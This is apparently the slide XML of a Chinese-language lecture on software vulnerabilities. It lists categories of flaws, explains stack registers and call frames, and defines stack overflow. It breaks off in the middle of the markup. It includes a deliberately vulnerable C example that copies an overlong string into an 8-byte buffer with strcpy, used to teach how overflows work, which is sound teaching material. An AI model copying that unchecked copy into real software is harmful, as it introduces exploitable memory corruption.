            <a:ext cx="2124075" cy="4603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堆溢出漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="2068513"/>
            <a:ext cx="2124075" cy="4619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整型溢出漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="2546350"/>
            <a:ext cx="2124075" cy="8318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格式化字符串溢出漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="3357563"/>
            <a:ext cx="1573212" cy="4603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其他</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="4149725"/>
            <a:ext cx="1573212" cy="4603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脚本漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2836863" y="4894263"/>
            <a:ext cx="1573212" cy="8318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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a: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注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="5946775"/>
            <a:ext cx="1573212" cy="461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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a: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漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5100638" y="3984625"/>
            <a:ext cx="2103437" cy="461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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a: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漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5100638" y="4845050"/>
            <a:ext cx="2103437" cy="461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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="左大括号 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339975" y="1916113"/>
            <a:ext cx="309563" cy="1657350"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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8" name="左大括号 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339975" y="4365625"/>
            <a:ext cx="309563" cy="1655763"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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9" name="左大括号 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1331913"/>
            <a:ext cx="309563" cy="1511300"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19851"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>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0" name="左大括号 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716463" y="4140200"/>
            <a:ext cx="309562" cy="863600"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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栈内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430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a:t>函数的参数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数返回地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一些通用寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(EDI,ESI…)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当前正在执行的函数的局部变量</a:t>
            </a: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a:xfrm>
            <a:off x="436563" y="877888"/>
            <a:ext cx="8229600" cy="5818187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>SP(ESP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>    即栈顶指针，随着数据入栈出栈而发生变化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>BP(EBP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>    即基地址指针，用于标识栈中一个相对稳定的位置。通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>BP,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>可以方便地引用函数参数以及局部变量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>IP(EIP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>    即指令寄存器，在将某个函数的栈帧压入栈中时，其中就包含当前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>值，即函数调用返回后下一个执行语句的地址</a:t>
            </a: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函数调用过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450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a:t>把参数压入栈</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>保存指令寄存器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>）中的内容（调用函数下一条命令地址地址），作为返回地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>放入栈当前的基址寄存器中内容（此时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>存储的地址为调用函数的基地址）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>把当前的栈指针</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>(ESP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>拷贝到基址寄存器，作为新的基地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>为本地变量留出一定空间，把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>减去适当的数值</a:t>
            </a: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函数调用中栈的工作过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460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a:t>调用函数前</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>参数压入栈</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>上级函数传给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>函数的参数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(EIP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>当前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>EBP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>函数的局部变量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>调用函数后</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>恢复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>EBP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>恢复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>EIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>局部变量不作处理</a:t>
            </a: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栈溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471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特点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>缓冲区在栈中分配</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>拷贝的数据过长</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>覆盖了函数的返回地址或其它一些重要数据结构、函数指针</a:t>
            </a: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溢出实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481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2400" dirty="0"/>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>AFunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i,int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> j)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    int m = 3;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    int n = 4;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>szBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>[8] = {0}; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>szBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, “This is a overflow buffer!”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>m = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    n = j;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>BFunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>m,n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    return 8;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>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FE7497F-3D59-F747-AF1F-A31353E1B44B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A57D109D-05B6-7A42-A833-C422C4AE5356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2636838"/>
            <a:ext cx="3886200" cy="3670300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>int AFunc(int i,int j)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>int m = 3;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>int n = 4;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>    m = i;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>n = j;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>    BFunc(m,n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>    return 8;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A526562-942E-9844-923B-503359B90C19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="2636838"/>
            <a:ext cx="3886200" cy="3670300"/>
          </a:xfrm>
